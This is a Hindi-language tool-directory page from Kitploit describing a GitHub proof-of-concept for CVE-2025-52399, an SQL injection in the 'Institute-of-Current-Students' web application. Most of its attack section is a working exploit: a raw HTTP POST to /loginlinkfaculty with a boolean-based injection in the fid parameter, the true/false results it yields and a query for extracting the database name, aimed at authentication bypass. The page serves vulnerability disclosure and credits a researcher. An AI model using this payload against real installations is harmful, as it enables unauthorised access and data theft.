Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-52399-SQLi-Institute-of-Current-Students — CVE-2025-52399 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, जो Institute-of-Current-Students एप्लिकेशन में loginlinkfaculty एंडपॉइंट के माध्यम से प्रमाणीकरण बाईपास और डेटा निष्कर्षण के लिए SQL इंजेक्शन का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/gmh5225/cve-2025-52399-sqli-institute-of-current-students
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubgmh5225/cve-2025-52399-sqli-institute-of-current-students

CVE-2025-52399-SQLi-Institute-of-Current-Students

CVE-2025-52399 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, जो Institute-of-Current-Students एप्लिकेशन में loginlinkfaculty एंडपॉइंट के माध्यम से प्रमाणीकरण बाईपास और डेटा निष्कर्षण के लिए SQL इंजेक्शन का प्रदर्शन करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

CVE-2025-52399 - वर्तमान छात्र संस्थान में SQL इंजेक्शन

सारांश

Institute-of-Current-Students एप्लिकेशन में loginlinkfaculty एंडपॉइंट, fid POST पैरामीटर के माध्यम से SQL इंजेक्शन के लिए असुरक्षित है। SQL क्वेरी में उपयोग करने से पहले पैरामीटर को उचित रूप से साफ नहीं किया जाता है, जिससे दूरस्थ हमलावर मनमानी SQL कमांड निष्पादित कर सकते हैं।

  • भेद्यता प्रकार: SQL इंजेक्शन
  • प्रभावित घटक: /loginlinkfaculty (POST)
  • प्रभावित पैरामीटर: fid
  • प्रमाणीकरण: आवश्यक नहीं
  • प्रभाव: प्रमाणीकरण बायपास, डेटा निष्कर्षण
  • परीक्षित: लोकलहोस्ट
  • डेटाबेस: icsnew
  • संस्करण: 1.0

PoC

HTTP अनुरोध

http POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

fid=-1'+OR+321=6+AND+000942=000942--&pass=example

पेलोड परिणाम

✅ -1' OR 3*2*1=6 AND 000942=000942 -- → सत्य ❌ -1' OR 2*3=4 AND 000942=000942 -- → असत्य

डेटाबेस निष्कर्षण

SELECT database(); -- 'icsnew' लौटाता है

संदर्भ

  • CVE-2025-52399 (MITRE)
  • असुरक्षित एप्लिकेशन
  • OWASP SQL Injection

खोजकर्ता

Isroil Mustafoqulov

टूल डाउनलोड करें